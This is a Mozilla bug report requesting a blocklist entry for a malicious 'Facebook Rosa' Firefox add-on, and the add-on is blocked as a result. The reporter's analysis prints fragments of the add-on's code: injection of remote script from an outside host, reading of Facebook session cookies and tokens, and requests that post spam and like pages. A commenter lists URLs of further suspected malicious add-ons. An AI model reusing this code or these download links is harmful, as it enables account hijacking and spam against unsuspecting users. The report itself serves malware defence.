Malicious "Facebook Rosa" add-on

RESOLVED FIXED

Status

()

Toolkit
Blocklisting
RESOLVED FIXED
5 years ago
a year ago

People

(Reporter: MarkH, Assigned: jorgev)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

156.41 KB, application/octet-stream
Details
(Reporter)

Description

5 years ago
Created attachment 613147 [details]
20120407_rosathemenplus.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded add-on from http://rosathemenplus.com/plugin.xpi


Actual results:

Report for http://rosathemenplus.com/plugin.xpi

** Summary **

On install, it will begin programmatically sending spam to your Facebook friends and have you like pages, all without your knowledge or consent.

** Embedded and Remote Files **

lib.js
http://temasuperplugin.info?'+Math.random() <http://temasuperplugin.info/?'+Math.random()>
icon48.png
icon16.png
icon128.png
manifest.json


** Embedded Metadata **



** Files Loaded **



** Remote Javascript Loaded **

...(a=(b=document).createElement('script')).src='http://temasuperplugin.in <http://temasuperplugin.in/>
fo?'+Math...
"description": "Verwandeln Sie Ihr Facebook in rosa!",
"content_scripts": [


** Facebook Paths Accessed **

... F
m"}9(3.2.4("o.5/b/a/q.6")!=-1||3.2.4("/b/a/s.6")!=-1){m.3.2=\'7://f.5/t.6?g
\'...
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d =
'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d =
'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
"name": "Facebook: Rosa Themen-Plugin",
"description": "Verwandeln Sie Ihr Facebook in rosa!",


** Facebook Data Accessed **

var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' +
'&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' +
'&post_fo...
user_id = readCookie('c_user');


** HTTP Requests **

var c = new XMLHttpRequest();
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);


** All URLs Loaded or Mentioned **

...var blog = "http://rosaausgabepro.com/farbe/" +
randomFromTo(8601,8800) + ".php"...
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d =
'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d =
'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
...document).createElement('script')).src='http://temasuperplugin.info?'+M <http://temasuperplugin.info/?'+M>
ath.rando...
"update_url": "http://rosaplugin.info/chrome.xml",




Expected results:

It should not post Facebook messages or like pages without your knowledge or consent.
(Assignee)

Comment 1

5 years ago
ID: pink@rosaplugin.info
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
(Assignee)

Comment 2

5 years ago
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i84
Status: ASSIGNED → RESOLVED
Last Resolved: 5 years ago
Resolution: --- → FIXED

Comment 3

5 years ago
hi can you ban this spammer addon too
http://faceeklenti.com/
http://faceeklenti.com/firefox.php
http://faceeklenti.com/eklenti/facebook.xpi

you may not access the website by having turkish ip address 

you can try access to site by http://www.gizlen.net/ a turkish web based proxy
(Assignee)

Comment 4

5 years ago
Please read the blocklisting guidelines (https://wiki.mozilla.org/Blocklisting) and file a new blocklist bug if you think it matches our requisites.
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.